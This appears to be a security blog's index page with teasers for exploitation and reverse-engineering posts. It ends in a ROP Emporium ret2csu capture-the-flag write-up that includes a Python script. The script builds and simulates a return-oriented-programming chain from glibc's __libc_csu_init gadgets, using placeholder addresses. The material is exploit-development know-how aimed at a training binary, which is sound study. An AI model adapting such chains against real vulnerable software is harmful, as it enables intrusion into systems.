NetSetMan 4.7.1 Unicode exploit

As part of this course the first assignment is to create a working exploit against NetSetMan 4.7.1 using a buffer overflow vulnerability. If you wish to follow along, the installer can be found on Exploit-DB. Additionally I’m using a Windows XP SP3 (EN) VM, making this a no-ASLR, 32-bit setup.

Fuzzing

Since the assignment doesn’t state where or how to trigger the overflow we have to fuzz it first, and as the application doesn’t expose any network ports this reduces the attack surface to either importing profiles or freeform text input.

Compiling win32 assembly on OpenBSD

Recently I’ve finished the Practical Malware Analysis book and I’ve wanted to familiarise myself a bit more with the Win32 API. After spending a good amount of time on setting up Visual Studio C++ for MASM (Microsoft Macro Assembler) I wanted to stab myself in the eye with a rusty fork due to the overload of visual clutter. Alas, running plain MASM on Windows 10 seems to be a no-go these days.

Poking old format string bugs

Earlier this week I ran into a fairly old format string bug in the Exuberant Ctags implementation; it turns out this particular issue was fixed back in November 2009, but the fix wasn’t picked up by vendors at the time. This isn’t a critical issue, but because it was fixed in SVN without a proper release being made afterwards, only those who decided to ship a package based on a Subversion checkout ended up with the fix.

Exploring Zyxel GS1900 firmware with Ghidra

or, how I found multiple vulnerabilities on a lazy Sunday afternoon

Earlier this year the NSA released Ghidra, a reverse engineering suite with support for a large number of CPU/MCU instruction sets. While I have some experience with Hopper and radare2 I wanted to play with Ghidra to poke around the firmware for my Zyxel GS1900-8 switch, which runs on a 32-bit MIPS CPU. All in all this has turned out to be an interesting exploration of both Ghidra and the GS1900-8-2.

ROP Emporium - ret2csu

ret2csu, the final ROP Emporium challenge. This one is GLIBC-specific but nonetheless it is a fun exercise which forces you to look beyond the standard functions which the application author wrote and instead explore other parts of the binary which are essentially provided by the ecosystem.

Exploring the binary

Not much going on with this binary:

jasper@ropper:~/ropemporium/ret2csu$ checksec ret2csu
[*] '/home/jasper/ropemporium/ret2csu/ret2csu'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

And as expected there is no usefulFunction or usefulGadgets:
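The "ecosystem-provided" code the excerpt refers to is the tail of __libc_csu_init, which glibc links into every non-PIE binary and which yields two gadgets: a six-register pop sled and a block that moves r13/r14/r15 into edi/rsi/rdx and then calls through [r12 + rbx*8]. The following is an added example, not code from the original post or from ROP Emporium: it lays out the chain for a no-PIE, no-canary, NX binary like the one above and models both gadgets over the resulting stack so the register bookkeeping (rbx = 0, rbp = 1, the 56 bytes of padding swallowed after the call) can be checked before touching a live process. Every address (CSU_POP, CSU_CALL, INIT_PTR, TARGET) and the 40-byte padding are placeholders, not the binary's real values; take your own from objdump or ropper. The register mapping used is the one found in newer glibc versions (rdx from r15, rsi from r14, edi from r13d); older versions swap r13 and r15, which the builder exposes as a parameter.

```python
import struct

# Placeholder addresses for illustration only (assumed, not the real binary's).
CSU_POP  = 0x40089a  # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x400880  # mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]; ...
INIT_PTR = 0x600e38  # assumed: a word (e.g. a _DYNAMIC entry) holding a pointer to _init
TARGET   = 0x4007b1  # assumed: the function we want to reach with rdi/rsi/rdx set
PAD_LEN  = 40        # assumed distance from buffer start to the saved return address

MASK64 = 0xffffffffffffffff


def p64(v):
    return struct.pack("<Q", v & MASK64)


def ret2csu_chain(rdi, rsi, rdx, target, pop=CSU_POP, call=CSU_CALL,
                  fnptr=INIT_PTR, pad=b"A" * PAD_LEN, new_glibc=True):
    """Build a ret2csu chain that lands in `target` with rdi/rsi/rdx controlled.

    new_glibc=True  -> gadget is mov rdx,r15; mov rsi,r14; mov edi,r13d
    new_glibc=False -> gadget is mov rdx,r13; mov rsi,r14; mov edi,r15d (older glibc)
    """
    r13, r15 = (rdi, rdx) if new_glibc else (rdx, rdi)
    chain = pad
    chain += p64(pop)
    chain += p64(0)        # rbx: index into [r12 + rbx*8]; keep it 0
    chain += p64(1)        # rbp: after "add rbx,1; cmp rbp,rbx" they match, so no loop
    chain += p64(fnptr)    # r12: address of a word containing a harmless function pointer
    chain += p64(r13)      # r13
    chain += p64(rsi)      # r14 -> rsi
    chain += p64(r15)      # r15
    chain += p64(call)
    # After the called function returns, the gadget runs: add rbx,1; cmp rbp,rbx;
    # jne <loop>; add rsp,8; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
    chain += p64(0) * 7    # 8 bytes for "add rsp,8" plus six pops, all discarded
    chain += p64(target)   # finally consumed by the ret
    return chain


def simulate(chain, pad_len=PAD_LEN, new_glibc=True):
    """Model the two __libc_csu_init gadgets over the chain.

    Returns (regs, rip) where rip is the address the final ret transfers to.
    The indirect call is assumed to hit a function that simply returns
    (that is what r12 -> fnptr is chosen for); memory itself is not modelled.
    """
    words = [struct.unpack("<Q", chain[i:i + 8])[0]
             for i in range(pad_len, len(chain), 8)]
    sp = 0
    regs = {}

    def pop():
        nonlocal sp
        v = words[sp]
        sp += 1
        return v

    # First ret goes to the pop gadget.
    rip = pop()
    if rip != CSU_POP:
        raise ValueError("chain does not start with the pop gadget")
    for r in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
        regs[r] = pop()
    rip = pop()
    if rip != CSU_CALL:
        raise ValueError("pop gadget does not return into the call gadget")
    if new_glibc:
        regs["rdx"], regs["rsi"], rdi_src = regs["r15"], regs["r14"], regs["r13"]
    else:
        regs["rdx"], regs["rsi"], rdi_src = regs["r13"], regs["r14"], regs["r15"]
    regs["rdi"] = rdi_src & 0xffffffff   # mov edi, r13d zero-extends: high bits lost
    regs["call_slot"] = (regs["r12"] + regs["rbx"] * 8) & MASK64
    # Loop control after the call returns.
    regs["rbx"] = (regs["rbx"] + 1) & MASK64
    if regs["rbp"] != regs["rbx"]:
        raise ValueError("rbp != rbx + 1: gadget would loop instead of falling through")
    sp += 1                               # add rsp, 8
    for r in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
        regs[r] = pop()                   # six pops from the padding
    rip = pop()                           # ret -> target
    return regs, rip


if __name__ == "__main__":
    chain = ret2csu_chain(0xdeadbeef, 0xcafebabe, 0xd00df00d, TARGET)
    regs, rip = simulate(chain)
    print(f"rdi={regs['rdi']:#x} rsi={regs['rsi']:#x} rdx={regs['rdx']:#x} -> {rip:#x}")
```

Two practical caveats the model makes visible: rdi only receives 32 bits, so a pointer argument cannot be passed through this gadget alone (a separate pop rdi is needed), and r12 must point at memory containing a function pointer, not at the function itself, which is why the _DYNAMIC entry for _init is the usual choice. Swapping new_glibc to match the disassembly of your own binary is essential; getting the r13/r15 order wrong silently swaps rdi and rdx.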